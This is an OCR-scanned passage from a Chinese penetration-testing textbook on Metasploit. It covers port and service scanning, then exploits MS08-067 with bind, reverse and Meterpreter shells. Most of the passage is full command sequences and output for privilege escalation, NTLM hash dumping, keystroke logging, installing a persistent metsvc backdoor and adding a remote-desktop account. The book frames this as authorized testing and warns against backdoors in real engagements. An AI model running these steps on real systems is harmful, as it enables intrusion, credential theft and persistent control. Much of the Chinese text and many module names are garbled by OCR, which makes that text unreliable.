
Z msfcli -h 

上 述 指 令 将 显示 所 有 可 用 的 模式 、 模 式 的 相关 说 明 ， 以 及 指令 所 
需 的 参数 。 请 注意 msfcli 需 要 使 用 等 号 给 参数 进行 赋值 ， 而 且 所 有 的 选 
项 都 区 分 大 小 写 。 下 壕 例 子 演 示 了 选 是 、 运 行 特定 exploit 模 板 的 具体 方 


法 。 


# msfcli windows/smb/ms08 067 netapi O 
[*] Please wait while we load the module tree... 


Name Current Setting Required Description 


RHOST yes The target address 
RPORT 445 yes Set the SMB service port 
SMBPIPE BROWSER yes The pipe name to use 
(BROWSER, 
SRVSVC) 


上 述 指 令 结尾 处 的 选项 0， 用 于 显示 指定 exploit 的 全 部 选项 。 下 述 
指令 通过 RHOST 人 参数 指定 目标 主机 的 IP 地 址 。 

# msfcli windows/smb/ms08 067 netapi RHOST=192.168.0.7 P 

[*] Please wait while we load the module tree... 


Compatible payloads 


Name Description 


generic/debug trap Generate a debug trap in the target process 
generic/shell, bind tcp Listen for a connection and spawn a 


command shell 


f£1X 8 YF RHOST# Wise I BH bNIPZ n. AW IP xeBUn TY 
payload， 并 执行 我 们 选取 的 exploit 。 

# msfcli windows/smb/ms08. 067 netapi RHOST=192.168.0.7 LHOST 
=192.168.0.3 PAYLOAD-windows/shell/reverse tcp E 

[*] Please wait while we load the module tree... 

[*] Started reverse handler on 192.168.0.3:4444 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang:English 

[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (240 bytes) to 192.168.0.7 

[*] Command shell session 1 opened (192.168.0.3:4444 -> 
192.168.0.7:1027) 

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 
Microsoft Corp. 

C:\WINDOWS\system32> 

上 述 信 息 表 明 ， 在 选 定 payload 并 设置 好 LHOST 参 数 之 后 ， 我 们 获 
取 了 目标 主机 的 本 地 shell 控 制 权 。 


9.3.3 Æ, 练 101 


本 市 将 讲解 漏洞 利用 框架 的 各 种 使 用 方法 。 尺 管 不 可 能 完全 展现 
Metasploit 框 架 的 各 种 功能 ， 但 是 我 们 细致 地 挑选 了 几 个 案例 ， 演 示 了 


CAVE HEMI BE o WERA T fEMetasploitf£ Z8, we I.E TATE 
教程 MetasploitUnleashed : http://www.offensive-security.com/metasploit- 
unleashed/。 官 方 教程 深入 地 讲解 了 exploit 模 板 开发 、 漏 洞 检 测 以 及 各 
种 评估 技术 。 

文 个 场景 将 使 用 Metasploit 框 架 集 成 的 NMap 程 序 进 行 端口 s TE ^ 
0OS 指 纹 识 别 ， 以 及 服务 鉴定 。 我 们 在 MSFConsole 中 执行 下 述 指 


msf > load db tracker 


[*] Successfully loaded plugin: db tracker 

msf > db nmap -T Aggressive -sV -n -O -v 192.168.0.7 

Starting Nmap 5.00 ( http://nmap.org ) at 2010-11-11 22:34 UTC 
NSE: Loaded 3 scripts for scanning. 

Initiating ARP Ping Scan at 22:34 

Scanning 192.168.0.7 [1 port] 

Completed ARP Ping Scan at 22:34, 0.00s elapsed (1 total hosts) 
Initiating SYN Stealth Scan at 22:34 

Scanning 192.168.0.7 [1000 ports] 

Discovered open port 445/tcp on 192.168.0.7 

Discovered open port 135/tcp on 192.168.0.7 

Discovered open port 25/tcp on 192.168.0.7 

Discovered open port 139/tcp on 192.168.0.7 

Discovered open port 3389/tcp on 192.168.0.7 

Discovered open port 80/tcp on 192.168.0.7 

Discovered open port 443/tcp on 192.168.0.7 

Discovered open port 21/tcp on 192.168.0.7 

Discovered open port 1025/tcp on 192.168.0.7 

Discovered open port 1433/tcp on 192.168.0.7 


Completed SYN Stealth Scan at 22:34, 3.04s elapsed (1000 total ports) 
Initiating Service scan at 22:34 

Scanning 10 services on 192.168.0.7 

Completed Service scan at 22:35, 15.15s elapsed (10 services on 1 host) 
Initiating OS detection (try #1) against 192.168.0.7 


PORT STATE SERVICE VERSION 


21/tcp open ftp Microsoft ftpd 
25/tcp open smtp Microsoft ESMTP 6.0.2600.2180 
80/tcp open http Microsoft IIS httpd 5.1 


135/tcp open msrpc Microsoft Windows RPC 

139/tcp open  netbios-ssn 

443/tcpopen https? 

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds 

1025/tcp open msrpc Microsoft Windows RPC 

1433/tcp open ms-sgl-s Microsoft SQL Server 2005 9.00.1399; 
RTM 

3389/tcp open microsoft-rdp Microsoft Terminal Service 

MAC Address: 00:0B:6B:68:19:91 (Wistron Neweb) 

Device type: general purpose 

Running: Microsoft Windows 2000|XP|2003 

OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - 
SP3, orWindows Server 2003 SPO - SP2 

Network Distance: 1 hop 

TCP Sequence Prediction: Difficulty-263 (Good luck!) 

IP ID Sequence Generation: Incremental 


Service Info: Host: custdesk; OS: Windows 


Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds 
Raw packets sent: 1026 (45.856K B) | Rcvd: 1024 (42.688KB) 

上 述 信 息 表 明 ， 现 在 已 经 成 功 对 目标 进行 扫描 ， 并 且 扫 描 结 采 已 
经 保存 在 当前 的 数据 库 会 话 中 。 如 需 查 看 扫描 阶段 识别 出 来 的 目标 主 
机 和 系统 服务 ， 可 单独 使 用 db_hosts 和 db_services 指 令 。 另 外 ， 如 果 您 
单独 使 用 NMAP 程 序 扫描 过 目标 主机 ， 而 且 已 经 把 扫描 报告 保存 为 
XML 格式 的 文件 ， 那 么 可 以 使 用 db_import_nmap_xml 命 令 把 Nmap 的 扫 
描 报告 导入 到 Metasploit 的 数据 库 里 。 

场景 2 

这 个 场景 将 演示 Metasploit 框架 的 辅助 工具 (auxiliaries) 模板 的 
使 用 方法 ， 旨 在 帮助 读者 了 解 辅助 工具 模板 在 渗透 测试 过 程 中 的 重要 
作用 。 

SNMP 字 符 串 扫描 程序 

这 个 模板 可 以 对 指定 网 段 进 行 SNMP (Simple Network Management 
Protocol) 扫描 ， 并 使 用 常见 的 团体 字符 对 SNMP 进 行 测 试 ， 最 终 显 示 
它 识 别 出 来 的 SNMP 设 备 信息 。 我 们 来 看 : 


msf > search snmp 


[*] Searching loaded modules for pattern 'snmp'... 


Auxiliary 
Name Disclosure Date Rank Description 
scanner/snmp/aix version normal AIX SNMP 


Scanner AuxiliaryModule 
scanner/snmp/community normal SNMP 


Community 


no 


Scanner 
msf > use auxiliary/scanner/snmp/community 
msf auxiliary(community) > show options 
Module options: 

Name Current Setting 


Required Description 


BATCHSIZE 256 yes 
The number of hosts to probe in each set 
CHOST no 


The local client address 
COMMUNITIES /opt/metasploit3/msf3/data/wordlists/snmp.txt 


The list of communities that should be attempted per host 
RHOSTS yes 

The target address range or CIDR identifier 
RPORT 161 yes 

The target port 
THREADS 1 yes 


The number of concurrent threads 
msf auxiliary(community) > set RHOSTS 10.2.131.0/24 
RHOSTS => 10.2.131.0/24 
msf auxiliary(community) > set THREADS 3 
THREADS => 3 
msf auxiliary(community) > set BATCHSIZE 10 


BATCHSIZE => 10 

msf auxiliary(community) > run 

[*] >> progress (10.2.131.0-10.2.131.9) 0/170... 

[*] >> progress (10.2.131.10-10.2.131.19) 0/170... 

[*] >> progress (10.2.131.20-10.2.131.29) 0/170... 

[*] Scanned 030 of 256 hosts (01196 complete) 

[*] >> progress (10.2.131.30-10.2.131.39) 0/170... 

[*] >> progress (10.2.131.40-10.2.131.49) 0/170... 

[*] >> progress (10.2.131.50-10.2.131.59) 0/170... 

[*] Scanned 060 of 256 hosts (02396 complete) 

[*] >> progress (10.2.131.60-10.2.131.69) 0/170... 

[*] >> progress (10.2.131.70-10.2.131.79) 0/170... 

[*] Scanned 080 of 256 hosts (03196 complete) 

[*] >> progress (10.2.131.80-10.2.131.89) 0/170... 

[*] >> progress (10.2.131.90-10.2.131.99) 0/170... 

[*] >> progress (10.2.131.100-10.2.131.109) 0/170... 

[*] 10.2.131.109 ‘public’ 'HP ETHERNET MULTI- 
ENVIRONMENT,ROM none,JETDIRECT,JD128, EEPROM 
V.33.19,CIDATE 12/17/2008' 

[*] Scanned 110 of 256 hosts (042% complete) 


[*] >> progress (10.2.131.240-10.2.131.249) 0/170... 

[*] >> progress (10.2.131.250-10.2.131.255) 0/102... 

[*] Scanned 256 of 256 hosts (100% complete) 

[*] Auxiliary module execution completed 

上 述 信 息 表 明 ， 程 序 识别 出 了 一 个 启用 SNMP 功能 的 设备 ， 而 且 
该 设备 可 以 受理 团体 字符 串 public。 虽 然 通 过 字符 串 public 获取 的 权限 


只 是 该 设备 的 只 读 权 限 ， 但 是 我 们 仍然 可 以 获取 大 量 有 价值 的 信息 。 
些 信息 可 能 包括 系统 数据 、 正 在 运行 的 服务 程序 、 网 络 地 址 、 版 本 
和 补丁 信息 等 
码 扫描 程序 
个 模板 将 会 扫 摘 指定 的 网 段 ， PASSES RT PLUS SESS VS HI M 
"nos (Virtual Network Computing, VNC) 服务 器 。 进 行 扫 摘 的 
指令 如 下 。 


msf > use auxiliary/scanner/vnc/vnc none auth 


这 
号 


msf auxiliary(vnc none auth) > show options 

msf auxiliary(vnc none auth) » set RHOSTS 10.4.124.0/24 

RHOSTS => 10.4.124.0/24 

msf auxiliary(vnc none auth) > run 

[*] 10.4.124.22:5900, VNC server protocol version : "RFB 004.000", 
not supported! 

[*] 10.4.124.23:5900, VNC server protocol version : "RFB 004.000", 
not supported! 

[*] 10.4.124.25:5900, VNC server protocol version : "RFB 
004.000",not supported! 

[*] Scanned 026 of 256 hosts (01096 complete) 

[*] 10.4.124.26:5900, VNC server protocol version : "RFB 
004.000",not supported! 

[*] 10.4.124.27:5900, VNC server security types supported : None,free 
access! 

[*] 10.4.124.28:5900, VNC server security types supported : None,free 
access! 


[*] 10.4.124.29:5900, VNC server protocol version : "RFB 
004.000",not supported! 


[*] 10.4.124.224:5900, VNC server protocol version : "RFB 
004.000",not supported! 

[*] 10.4.124.225:5900, VNC server protocol version : "RFB 
004.000",not supported! 

[*] 10.4.124.227:5900, VNC server security types supported 
None,free access! 

[*] 10.4.124.228:5900, VNC server protocol version : "RFB 
004.000",not supported! 

[*] 10.4.124.229:5900, VNC server protocol version : "RFB 
004.000",not supported! 

[*] Scanned 231 of 256 hosts (09096 complete) 

[*] Scanned 256 of 256 hosts (10096 complete) 

[*] Auxiliary module execution completed 

上 述 信 息 表 明 MetasploitfÉ RH Sz dX 8 T 4R Z Z6 sa Jer ME SUL y o] 
ES VNCHRS 88 ° a BORE Dr IER UI IR] Ps BFE, HEE DLA SHR 
3 TZ VIIIVNCHRA as, ARRON AS A A 

IIS6 WebDAV Unicode 身份 验证 旁 路 漏洞 

这 个 模板 将 会 扫描 指定 的 网 段 ， 以 搜索 存在 IS6 WebDAV 认证 劳 
路 漏洞 的 主机 。 局 动 扫 拉 任 务 的 指令 如 下 。 


msf > use auxiliary/scanner/http/ms09_020_webdav_unicode_bypass 


msf auxiliary(ms09_020_webdav_unicode_bypass) > show options 

msf auxiliary(ms09_020_webdav_unicode_bypass) > set RHOSTS 

10.8.183.0/24 

RHOSTS => 10.8.183.0/24 

msf auxiliary(ms09 020 webdav unicode bypass) » set THREADS 
10 


THREADS => 10 

msf auxiliary(ms09 020 webdav unicode bypass) > run 

[-] Folder does not require authentication. [302] 

[-] Folder does not require authentication. [400] 

[*] Confirmed protected folder http://10.8.183.9:80/ 401 (10.8.183.9) 
[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [403] 

[-] Folder does not require authentication. [302] 

[-] Folder does not require authentication. [501] 


[-] Folder does not require authentication. [501] 


[*] Confirmed protected folder http://10.8.183.162:80/ 
401(10.8.183.162) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 


[*] Confirmed protected folder http://10.8.183.155:80/ 
401(10.8.183.155) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[*] Confirmed protected folder http://10.8.183.166:80/ 
401(10.8.183.166) 

[*]Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[*] Confirmed protected folder http://10.8.183.168:80/ 
401(10.8.183.168) 


[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[*] Confirmed protected folder http://10.8.183.167:80/ 
401(10.8.183.167) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [501] 

[*] Confirmed protected folder http://10.8.183.171:80/ 
401(10.8.183.171) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [501] 


[-] Folder does not require authentication. [501] 


[-] Folder does not require authentication. [302] 

[5] Confirmed protected folder http://10.8.183.178:80/ 
401(10.8.183.178) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 

[-] Folder does not require authentication. [501] 

[-] Folder does not require authentication. [501] 

[*] Scanned 182 of 256 hosts (07196 complete) 

[-] Folder does not require authentication. [501] 

[*] Confirmed protected folder http://10.8.183.183:80/ 
401(10.8.183.183) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 


[-] Folder does not require authentication. [302] 

[*] Confirmed protected folder http://10.8.183.188:80/ 
401(10.8.183.188) 

[*] Testing for unicode bypass in IIS6 with WebDAV enabled using 
PROPFIND request. 


[-] Folder does not require authentication. [405] 

[*] Scanned 256 of 256 hosts (100% complete) 

[*] Auxiliary module execution completed 

EA ARH, Metasploit TEEZR SE EX, SW APRA, DUAE 
到 了 存在 MS09-020 IIS6 WebDAV Unicode Authentication Bypass 漏 洞 的 
主机 。 或 许 ， 这 种 模板 有 助 于 我 们 发 现 网 络 中 配置 不 当 的 服务 器 ， 提 
前 发 现 安全 隐患 。 

场景 3 

这 个 场景 将 会 介绍 几 种 常见 的 payload (bind ` reverse 和 meterpreter 
shell) ， 并 且 以 漏洞 利用 的 角度 探讨 它们 的 功能 。 这 些 实例 还 将 展示 
payload 的 使 用 方法 和 时 机 。 

bind shell 

bind 〈 绑 定型 ) shell 用 于 提供 远程 shell 连 接 。 在 成 功利 用 了 目标 主 
机 上 的 安全 漏洞 ， 并 且 成 功 执行 了 shellcode 程 序 以 后 ， 渗 透 人 员 可 在 目 
标 主 机 上 的 特定 端口 上 运行 bind shel， 以 让 其 他 主机 继续 控制 这 台 主 
机 。 攻 击 人 员 可 以 使 用 基于 TCP 连接 的 标准 输入 输出 (stdin/stdout) 
隧道 工具 (例如 Netcat) 连接 到 被 攻破 的 主机 ， 通 过 bind shell 继续 实 
施 控制 。 它 的 应 用 场合 与 Telnet 服务 器 /客户 端 十 分 相似 ， 主 要 适用 于 
以 NAT (Network Address Translation) 方式 连 入 网 络 的 渗透 人 员 、 攻 
击 人 员 的 设备 与 目标 主机 之 间 有 防火 墙 的 情况 ， 即 适用 于 无 法 从 被 测 
主机 直接 连接 到 攻击 人 员 主 机 IP 的 各 种 情况 。 


可 通过 下 述 指令 利用 主机 漏洞 并 安装 bind shell ° 

msf > use exploit/windows/smb/ms08 067. netapi 

msf exploit(ms08 067 netapi) > show options 

msf exploit(ms08 067 netapi) > set RHOST 192.168.0.7 

RHOST => 192.168.0.7 

msf exploit(ms08 067 netapi) > Set PAYLOAD 
windows/shell/bind tcp 

PAYLOAD => windows/shell/bind tcp 

msf exploit(ms08 067 netapi) > exploit 

[*] Started bind handler 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang:English 

[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (240 bytes) to 192.168.0.7 

[*] Command shell session 1 opened (192.168.0.3:41289 -> 

192.168.0.7:4444) at Sat Nov 13 19:01:23 +0000 2010 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32> 

上 述 信 息 表 明 ，Metasploit 通过 集成 的 payload 处 理 程序 自动 连接 
到 了 bind shell。 我 们 可 以 自己 编写 shellcode， 利 用 exploit 程序 安装 bind 
shell， 然 后 再 使 用 Netcat 这 类 第 三 方 工具 连接 到 bind shell。 有 关 netcat 
在 网 络 安 全 测试 中 的 各 种 用 途 的 实例 说 明 ， 请 参见 
http://en.wikipedia.org/wiki/Netcat ° 


reverse shell 


reverse 〈 反 射 型 ) shell Fhe AY (bind) shell ZA f^ [Fl » reverse 
shell PEE H PL ESB re ig, (IH SE PRX PABX PE 
TU EK BCA TTA, LER SE LE oy E Re IP A mg LI, Jf 
提供 一 个 shell。reverse shell 适 用 于 被 测 主机 采用 NAI 方 式 连接 网 络 的 情 
况 ， 或 者 被 测 主机 受 防 火 圭 剑 护 而 使 渗透 人 员 不 能 从 外 网 直接 访问 被 
测 主机 的 各 种 情况 。 

下 述 指令 可 设置 安装 reverse shell 。 

msf > use exploit/windows/smb/ms08 067 netapi 

msf exploit(ms08 067 netapi) > set RHOST 192.168.0.7 

RHOST => 192.168.0.7 

msf exploit(ms08 067 netapi) > Set PAYLOAD 
windows/shell/reverse tcp 

PAYLOAD => windows/shell/reverse tcp 

msf exploit(ms08 067 netapi) > show options 

msf exploit(ms08 067 netapi) > set LHOST 192.168.0.3 

LHOST => 192.168.0.3 

msf exploit(ms08 067 netapi) > exploit 

[*] Started reverse handler on 192.168.0.3:4444 

[*] Automatically detecting the target... 


[*] Fingerprint: Windows XP Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (240 bytes) to 192.168.0.7 

[*] Command shell session 1 opened (192.168.0.3:4444 -> 
192.168.0.7:1027) at Sat Nov 13 22:59:02 +0000 2010 
Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 


C:\WINDOWS\system32> 

在 安装 reverse shell 时 需 配 置 攻 击 者 的 IP (例如 LHOST 
192.168.0.3) ， 而 在 安装 (FEA) bind shell 则 没有 这 项 设置 。 

inline payload 和 staged payload 的 区 别 有 哪 些 ? 

inline payload 属 于 上 自主 型 shellcode， 它 的 shellcode 和 exploit 都 在 同 
一 个 程序 文件 里 。 而 staged payload 在 两 台 主 机 之 间 建 立 通信 隧道 ， 并 
通过 隧道 执行 shellcode 程 序 。 如 果 对 payload 的 文件 尺寸 有 严格 要 求 ， 
那么 可 使 用 staged payload， 因 为 它 的 文件 尺寸 比 inline payload 的 文件 
小 得 多 。 

Meterpreter 

Meterpreter zi — FHC tH > RAY > STORER ^ ABAD RAY 
payload， 它 可 在 目标 主机 的 系统 内 存 里 注入 DLL 《注入 的 DLL 完全 不 
会 以 文件 形式 存在 ) 。 此 外 ， 它 还 文 持 在 运行 期 间 加 载 脚本 和 插件 。 
在 漏洞 利用 的 后 期 阶段 ， 它 的 动态 加 载 特性 极 大 地 拓 完 了 活 透 人 员 的 
作业 空间 ， 方 便 了 提 权 、 保 存 系统 账号 、 进 行 关键 记录 、 驻 留 性 后 门 
服务 、 开 局 远程 果 面 等 各 种 操作 。 默 认 情 况 下 ，Meterpreter shell 会 采 
用 全 程 加 密 的 通信 方式 。 

可 通过 下 述 指令 利用 漏洞 并 安装 Meterpreter payload ° 

msf > use exploit/windows/smb/ms08 067. netapi 

msf exploit(ms08 067 netapi) > set RHOST 192.168.0.7 

RHOST => 192.168.0.7 

msf exploit(ms08 067 netapi) > show payloads 


msf exploit(ms08 067 netapi) > set PAYLOAD 
windows/meterpreter/reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 


msf exploit(ms08 067 netapi) > show options 


msf exploit(ms08 067. netapi) > set LHOST 192.168.0.3 
LHOST => 192.168.0.3 

msf exploit(ms08 067 netapi) > exploit 

[*] Started reverse handler on 192.168.0.3:4444 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (749056 bytes) to 192.168.0.7 

[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 
192.168.0.7:1029) at Sun Nov 14 02:44:26 +0000 2010 


meterpreter > help 


通过 上 述 指令 ， 我 们 成 功 地 连接 到 了 被 测 主机 的 Meterpreter shell, 
然后 我 们 通过 help 查 看 各 种 可 用 的 命令 。 下 一 步 ， 我 们 要 查看 当前 用 户 
的 操作 权限 ， 然 后 通过 getsystem 脚 本 提升 目 己 的 权限 为 系统 权限 。 

meterpreter > getuid 

Server username: CUSTDESKNsalesdept 

meterpreter > use priv 


meterpreter > getsystem -h 


上 述 指 令 将 会 显示 提升 权限 的 各 种 技术 。 如 宁 不 局 用 任何 选项 ， 
直接 使 用 getsystem 指 令 将 会 逐一 尝试 各 种 提 权 技术 ， 直 到 成 功 提 升 到 
系统 权限 为 止 。 

meterpreter > getsystem 


...got system (via technique 1). 


meterpreter > getuid 

Server username: NT AUTHORITYNSYSTEM 

meterpreter > sysinfo 

Computer: CUSTDESK 

OS : Windows XP (Build 2600, Service Pack 2). 

Arch : x86 

Language: en_US 

如 果 在 指令 中 启用 exploit -j -z 选 项 ， 那 么 漏洞 利用 程序 将 会 在 后 人 台 
运行 ， 您 也 不 会 进入 交互 式 的 Meterpreter shell。 但 是 ， 如 果 程 序 成 功 建 
立 了 会 话 ， 您 可 以 通过 sessions -i id 指令 返回 shell 的 交互 界面 。 如 需 了 
解 会 话 的 ID， 可 使 用 sessions -] 指 令 查 看 ID 的 确切 值 。 

接 下 来 ， 我 们 要 获取 被 测 主机 的 系统 账户 和 密码 。Windows 以 
NTLM 哈 希 (hash) 的 格式 保存 用 户 的 账号 信息 。 很 多 工具 和 技术 都 可 
以 破解 NTLM 哈 锅 。 现 在 我 们 一 起 见证 Meterpreter 的 真正 威力 。 


meterpreter > run hashdump 


[*] Obtaining the boot key... 

[*] Calculating the hboot key using SYSKEY 
71e52ce6b86e5da0c213566a123 

6f892... 

[*] Obtaining the user list and keys... 

[*] Decrypting user keys... 

[*] Dumping password hashes... 

h 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16 
ae931b73c59d7e 0c089c0::: 

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b7 
3c59d7e0c08 9c0::: 


HelpAssistant: 1000:d2cd5d550e14593b12787245127c866d:d3e35f657 
c924d0b31eb 811d2d986df9::: 

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c8e 
dfOdOdb48cbf7b 2835ec013cfb9c5::: 

Momin 
Desktop:1003:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769 
204 beb12283678::: 

IUSR MOMINDESK:1004:a751dcb6ea9323026eb8f7854da74a24:b01 
96523134dd9a21bf 6b80e02744513::: 

ASPNET:1005:ad785822109dd077027175f3382059fd:21ff86d627bcf3 
80a5b1b6abe5d 8eldd::: 

IWAM. MOMINDESK:1009:12a75a1d0cf47cd0c8e2f82a92190b42:c7 
4966d83d519ba41e5 196e00f94e113::: 

h4x:1010:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769 
204beb 12283678::: 

salesdept:1011:8f51551614ded19365b226f9bfc33fab:7ad83174aadb77f 
aac126fdd 377b1693::: 

接 下 来 ， 我 们 通过 Meterpreter shell 运行 keylog 程序 ， 记 录 键 盘 输 
入 的 内 容 。 键 盘 散 击 记录 可 能 含有 目标 主机 的 多 项 敏感 信息 。 

meterpreter > getuid 

Server username: NT AUTHORITYNSYSTEM 


meterpreter > ps 


Process list 


PID Name Arch Session User Path 


0 [System Process] 


4 System x86 0 NT 
AUTHORITY\SYSTEM 
384 smss.exe x86 0 NT 
AUTHORITY\SYSTEM 
\SystemRoot\System32\smss.exe 
488 csrss.exe x86 0 NT 
AUTHORITY\SYSTEM 
\??\C:\WINDOWS\system32\csrss.exe 
648 winlogon.exe x86 0 NT 
AUTHORITY\SYSTEM 
\??\C:\WINDOWS\system32\winlogon.exe 
692 services.exe x86 0 NT 
AUTHORITY\SYSTEM 
C:\WINDOWS\system32\services.exe 
704 Isass.exe x86 0 NT 
AUTHORITY\SYSTEM 
C:\WINDOWS\system32\Isass.exe 


148 alg.exe x86 0 NT AUTHORITY\LOCAL 
SERVICE 
C:\WINDOWS\System32\alg.exe 
3172 explorer.exe x86 0 CUSTDES K\salesdept 
C:\WINDOWS\Explorer.EXE 
3236 reader_sl.exe x86 0 CUSTDESKNsalesdept 
C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe 
接 下 来 ,我们 把 Meterpreter shell 插入 explorer.exe 的 进程 
(3172) ， 以 便 开 始 记录 当前 用 户 对 系统 的 操作 ， 所 涉及 的 指令 如 


meterpreter > migrate 3172 

[*] Migrating to 3172... 

[*] Migration completed successfully. 
meterpreter > getuid 

Server username: CUSTDESKNsalesdept 
meterpreter > keyscan, start 


Starting the keystroke sniffer... 


现在 就 可 以 启动 键盘 记录 程序 。 此 后 ， 我 们 等 待 程序 孙 取 键盘 记 


meterpreter > keyscan dump 

Dumping captured keystrokes... 

«Return» www.yahoo.com «Return? «Back» Wwww.bbc.co.uk 
«Return» 

meterpreter > keyscan, stop 

Stopping the keystroke sniffer... 

上 述 信 息 表 明 ， 键 盘 记 录 程 序 记录 了 被 测 主机 的 网 上 活动 。 类 似 
地 ， 我 们 可 以 把 它 注 入 到 winlogon.exe (pid 648) 进程 里 ， 获 取 所 有 账 
户 的 登录 信息 。 

经 过 上 述 操 作 ， 我 们 已 经 获取 了 被 测 主机 的 操作 权限 。 但 是 如 条 
目标 主机 安装 了 漏洞 修复 程序 的 补丁 ， 我 们 束 无 法 利用 原 有 漏洞 攻击 
有 关 服 务 或 应 用 程序 。 为 了 避免 这 一 情况 ， 我 们 可 以 通过 党 人 所 说 的 
“后 1 门 ” 服 务 程序 维护 自己 对 目标 主机 的 控制 。 务 必要 注意 : 一 旦 在 被 
测 主机 上 安装 了 Meterpreter 提 供 的 后 门 服务 程序 ， 所 有 人 都 可 以 控制 
被 测 主机 ;因为 这 个 后 面 服 务 程序 不 对 连 入 的 控制 瑞 进行 身份 验证 。 
换 句 话说 ， 这 个 程序 可 能 会 让 不 请 目 来 的 人 控制 被 测 主 机 ， 这 无 颖 是 
对 被 测 单位 形成 了 安全 威胁 。 在 正式 的 渗透 测试 业务 中 ， 这 种 有 利于 


第 三 方 攻击 的 行为 通常 都 被 服务 合同 明文 禁止 。 所 以 ， 我 们 不 建议 您 
在 正式 的 测试 环境 中 使 用 Meterpreter 提供 的 后 门 服务 程序 。 您 也 应 当 
在 拟定 合同 的 范围 胃 定 阶段 明确 有 关 规 则 。 

msf exploit(ms08 067 netapi) > exploit 

[*] Started reverse handler on 192.168.0.3:4444 

[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 2 - lang:English 

[*] Selected Target: Windows XP SP2 English (NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (749056 bytes) to 192.168.0.7 

[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 

192.168.0.7:1032) at Tue Nov 16 19:21:39 +0000 2010 


meterpreter > ps 


292 alg.exe x86 0 NT AUTHORITYNLOCAL SERVICE 
C:\WINDOWS\System32\alg.exe 

1840 csrss.exe x86 2 NT AUTHORITY\SYSTEM 
\??\C:\WINDOWS\system32\csrss.exe 

528 winlogon.exe x86 2 NT AUTHORITY\SYSTEM 
\??\C:\WINDOWS\system32\winlogon.exe 

240 rdpclip.exe x86 0 CUSTDESK\Momin Desktop 
C:\WINDOWS\system32\rdpclip.exe 

1060 userinit.exe x86 0 CUSTDESK\Momin Desktop 
C:\WINDOWS\system32\userinit.exe 

1544 explorer.exe x86 0 CUSTDESK\Momin Desktop 
C:\WINDOWS\Explorer.EXE 


meterpreter > migrate 1544 
[*] Migrating to 1544... 
[*] Migration completed successfully. 


meterpreter > run metsvc -h 


meterpreter > run metsvc 

[*] Creating a meterpreter service on port 31337 

[*] Creating a temporary installation directory 

C:\DOCUME™1\MOMIND ™1\LOCALS ~™1\Temp\oNyLOPesS... 

[*] >> Uploading metsrv.dll... 

[*] >> Uploading metsvc-server.exe... 

[*] >> Uploading metsvc.exe... 

[*] Starting the service... 

* Installing service metsvc 

* Starting service 

Service metsvc successfully installed. 

通过 上 述 指 令 ， 我 们 在 被 测 主机 上 安装 了 后 门 服务 程序 ， 现 在 可 
以 关闭 当前 的 meterpreter 会 话 。 在 需要 控制 被 测 主机 的 时 候 ， 我 们 可 以 
Val FA multi/handler HJ windows/metsvc_bind_tcp payload， 通 过 后 门 控制 
远程 主机 © 


meterpreter > exit 


[*] Meterpreter session 1 closed. Reason: User exit 

msf exploit(ms08_067_netapi) > back 

msf > use exploit/multi/handler 

msf exploit(handler) > set PAYLOAD windows/metsvc bind tcp 
PAYLOAD => windows/metsvc bind tcp 

msf exploit(handler) > set LPORT 31337 


LPORT => 31337 

msf exploit(handler) > set RHOST 192.168.0.7 

RHOST => 192.168.0.7 

msf exploit(handler) > exploit 

[*] Starting the payload handler... 

[*] Started bind handler 

[*] Meterpreter session 2 opened (192.168.0.3:37251 -> 

192.168.0.7:31337) at Tue Nov 16 20:02:05 +0000 2010 

meterpreter > getuid 

Server username: NT AUTHORITY\S YSTEM 

此 外 ，Meterpreter 的 getgui 脚本 也 很 有 和 用， 它 可 开启 目标 主机 的 
远程 桌面 功能 。 如 需 在 目标 主机 上 创建 新 的 账号 ， 并 强制 启用 远程 保 
面 服务 ， 可 使 用 下 述 指令 。 

meterpreter > run getgui -u btuser -p btpass 

[*] Windows Remote Desktop Configuration Meterpreter Script by 

Darkoperator 

[*] Carlos Perez carlos perez(2darkoperator.com 

[*] Language set by user to: 'en EN' 

[*] Setting user account for logon 

[*] Adding User: btuser with Password: btpass 

